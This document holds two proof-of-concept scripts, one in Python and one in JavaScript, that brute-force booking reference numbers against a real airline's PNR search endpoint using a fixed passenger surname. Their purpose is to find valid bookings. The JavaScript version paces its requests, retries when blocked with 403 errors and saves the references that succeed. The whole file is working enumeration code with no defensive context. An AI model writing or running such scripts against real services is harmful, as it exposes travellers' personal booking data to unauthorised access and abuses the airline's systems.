File: poc.py
import aiohttp
import asyncio

async def make_request(session, pnr_no):
    url = 'https://web.flypgs.com/pegasus/pnr-search/filtered/secured'
    payload = {"pnrNo": pnr_no, "surname": "ASLANBAŞ", "deleteOptionalSsr": True, "filter": "MMB"}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "tr",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/json",
        "X-Platform": "web",
        "X-Version": "1.35.1",
        "Access-Control-Allow-Origin": "*",
        "Cache-Control": "no-cache, no-store, must-revalidate",
        "Pragma": "no-cache",
        "X-Dtpc": "35$75108566_563h19vKIIMHFPDFQURMQKFIUUETDCGMLWCRLEV-0e0"
    }
    async with session.post(url, json=payload, headers=headers) as response:
        html_content = await response.json()
        print(f"{pnr_no} - {response.status}")
        if response.status == 200:
            return await response.json()        
        else:
            return None

async def main():
    async with aiohttp.ClientSession() as session:
        with open('output.txt', 'r') as f:
            pnr_numbers = [line.strip() for line in f.readlines()]

        for pnr_no in pnr_numbers:
            await make_request(session, pnr_no)

asyncio.run(main())

File: poc.js
const fs = require('fs');
const axios = require('axios');

const fileContent = fs.readFileSync('output.txt', 'utf-8');
const values = fileContent.trim().split('\n'); // assuming each value is on a separate line

let counter = 0;
let errors = 0;
let start = Date.now();
let requestsPerMinute = 0;

const sendRequest = (value) => {
  axios.post('https://web.flypgs.com/pegasus/pnr-search/filtered/secured', {
    pnrNo: value.trim(),
    surname: 'ASLANBAŞ'
  }, {
    headers: {
      'Accept': 'application/json, text/plain, */*',
      'Accept-Encoding': 'gzip, deflate',
      'Content-Type': 'application/json',
      'X-Platform': 'web',
      'Cache-Control': 'no-cache, no-store, must-revalidate'
    }
  })
  .then(response => {
    if (response.status === 200) {
      console.log(`Response status: ${response.status}, pnrNo: ${value.trim()}`);
      fs.appendFileSync('status_codes.txt', `${value.trim()}\n`);
    } else {
      console.error(`Unexpected response status: ${response.status}, pnrNo: ${value.trim()}`);
    }
  })
  .catch(error => {
    if (error.response.status === 403) {
      console.log(`Got 403, waiting 5 seconds and trying again...`);
      setTimeout(() => {
        sendRequest(value);
      }, 5000);
    } else {
      console.error(`Error: ${error.message}, pnrNo: ${value.trim()}`);
      errors++;
    }
  });
}

const intervalId = setInterval(() => {
  if (counter < values.length) {
    sendRequest(values[counter]);
    counter++;
    requestsPerMinute++;
  } else {
    clearInterval(intervalId);
    console.log(`All requests sent. Total: ${values.length}, errors: ${errors}`);
  }

  const elapsedSeconds = (Date.now() - start) / 1000;
  if (elapsedSeconds >= 60) {
    console.log(`${requestsPerMinute} requests sent in the last 60 seconds.`);
    start = Date.now();
    requestsPerMinute = 0;
  }
}, 350);
